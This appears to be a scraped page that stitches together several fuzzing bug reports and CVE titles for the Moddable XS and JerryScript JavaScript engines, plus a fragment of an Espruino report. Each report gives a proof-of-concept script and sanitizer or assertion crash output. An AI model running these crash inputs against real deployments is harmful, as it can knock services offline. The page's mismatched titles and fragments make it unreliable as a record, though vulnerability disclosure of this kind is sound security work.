  0x100040bda0c0: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
  0x100040bda0d0: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
  0x100040bda0e0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x100040bda0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\====ABORTING

CVE-2021-46325: stack-buffer-overflow src/jsutils.c:751 in vcbprintf · Issue #2114 · espruino/Espruino

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsArray.c in fx_Array_prototype_sort.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**SEGV xs/sources/xsArray.c:2237:7 in fx\_Array\_prototype\_sort #766**

Open

hope-fly opened this issue

Jan 7, 2022

· 2 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
#debug
make -f xst.mk

**Test case**poc.js

    
    var size = 256;
    var array1 = new Array(size);
    
    function toStr() {
      array1.splice(0, 2);
      return array1.sort().toString();
    }
    
    function JSEtest() {
      for (var i = 0; i < size; i++) {
        array1[i] = new Array(i);
        array1.sort()[i].toString = toStr;
      }
      array1.sort();
    }
    
    JSEtest();
**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js

AddressSanitizer:DEADLYSIGNAL
=================================================================
==101668==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x00000057e1b4 bp 0x7ffe5dc36870 sp 0x7ffe5dc35840 T0)
==101668==The signal is caused by a READ memory access.
==101668==Hint: address points to the zero page.
    #0 0x57e1b3 in fx\_Array\_prototype\_sort /root/moddable/xs/sources/xsArray.c:2237:7
    #1 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #2 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #3 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #4 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #5 0x7faf269ccbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #6 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsArray.c:2237:7 in fx\_Array\_prototype\_sort
==101668==ABORTING

Credits: Found by OWL337 team.

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

When the testcase changed a little, there's a new crash during fuzzing. I'm not sure whether it's a duplicated issue or not.  
If its not, I'll open a new issue. Hope the info listed as follows will be helpful!

**Test case**poc.js

    
    var size = 1000;
    var array1 = new Array(size);
    
    function toStr() {
        array1.splice(0, 2);
        return array1.toString();
    }
    
    function JSEtest() {
        for (var i = 0; i < size; i++) {
            array1[i] = new Array(i);
            array1.sort()[i].toString = toStr;
        }
        array1.sort();
    }
    
    JSEtest();
**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js

AddressSanitizer:DEADLYSIGNAL
=================================================================
==39035==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000004c0 (pc 0x00000059c0a6 bp 0x7ffc9a80fa50 sp 0x7ffc9a80f730 T0)
==39035==The signal is caused by a READ memory access.
==39035==Hint: address points to the zero page.
    #0 0x59c0a5 in fxCompareArrayItem /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18
    #1 0x57dc9a in fx\_Array\_prototype\_sort /home/f1yfuzz/moddable/xs/sources/xsArray.c:2235:14
    #2 0x84f3ca in fxRunID /home/f1yfuzz/moddable/xs/sources/xsRun.c:842:7
    #3 0x8ceaac in fxRunScript /home/f1yfuzz/moddable/xs/sources/xsRun.c:4766:4
    #4 0xad3231 in fxRunProgramFile /home/f1yfuzz/moddable/xs/tools/xst.c:1387:2
    #5 0xacfa83 in main /home/f1yfuzz/moddable/xs/tools/xst.c:281:8
    #6 0x7f8d44116bf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #7 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18 in fxCompareArrayItem
==39035==ABORTING

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 13, 2022**

Thanks! From a quick look, it is tough to say if these are the same cause or not – the tests and crash are quite similar but the crash is in a different place. We'll investigate and let you know.

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46327: SEGV xs/sources/xsArray.c:2237:7 in fx_Array_prototype_sort · Issue #766 · Moddable-OpenSource/moddable

There is an Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /jerry-core/ecma/base/ecma-literal-storage.c in JerryScript 3.0.0.

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**poc.js

    
    var a = new Array(286331153, 572662306, 858993459, 1145324612, 303174162, 589505315, 305419888, 30583);
    var handler = {
        getPrototypeOf: function (target, name) {
            return a;
        }
    };
    var p = new Proxy([], handler);
    var b = [
        {},
        [],
        'natalie'
    ];
    __proto__.__proto__ = p;
    eval("function test_configurable_accessor() { print('replacement'); }");
    [].flat.call(b);
​ ​**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

Unhandled exception:
     0: <eval\>:1:64
     1: poc.js:14:1
ICE: Assertion 'ECMA\_STRING\_IS\_REF\_EQUALS\_TO\_ONE (string\_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma\_free\_string\_list):77.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    987 abort      jerry poc.js

Credits: Found by OWL337 team.

CVE-2021-46348: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. · Issue #4941 · jerryscript-project/jerryscript

There is an Assertion 'ecma_is_value_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c in JerryScript 3.0.0.

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**poc.js

    
    class JSEtest {
        set #m(v) { this._v = v; }
    
        method() {
            let self = !this;
            function innerFunction() {
                self.#m = 'Test262';
            }
            innerFunction();
        }
    }
    
    let c = new JSEtest();
    c.method();
    assert.sameValue(c._v, 'Test262');
    let o = {};
    assert.throws(TypeError, function () {
        c.method.call(o);
    }, 'accessed private setter from an ordinary object');
​**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma\_is\_value\_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma\_get\_object\_from\_value):838.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    25286 abort      jerry poc.js

Credits: Found by OWL337 team.

CVE-2021-46350: Assertion 'ecma_is_value_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_object_from_value):838. · Issue #4936 · jerryscript-project/jerryscript

There is an Assertion 'flags & PARSER_PATTERN_HAS_REST_ELEMENT' failed at /jerry-core/parser/js/js-parser-expr.c in JerryScript 3.0.0.

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**poc.js

    
    var iterCount = 0;
    
    async function JSEtest() {
      for await (var { a, b, ...rest }"of [{x: 1, y: 2, a: 5, b: 3}]) {
        assert.sameValue(rest.a, undefined);
      assert.sameValue(rest.b, undefined);
    
      verifyProperty(rest, "x", {
        enumerable: true,
        writable: true,
        configurable: true,
        value: 1
      });
    
      verifyProperty(rest, "y", {
        enumerable: true,
        writable: true,
        configurable: true,
        value: 2
      });
    
      iterCount += 1;
    }
    
    JSEtest()
      .then(() => assert.sameValue(iterCount, 1, 'iteration occurred as expected'), $DONE)
      .then($DONE, $DONE);
​**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'flags & PARSER\_PATTERN\_HAS\_REST\_ELEMENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser\_parse\_object\_initializer):4119.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    32968 abort      jerry poc.js

Credits: Found by OWL337 team.

CVE-2021-46344: Assertion 'flags & PARSER_PATTERN_HAS_REST_ELEMENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_object_initializer):4119. · Issue #4928 · jerryscript-project/jerryscript

Tag

#ubuntu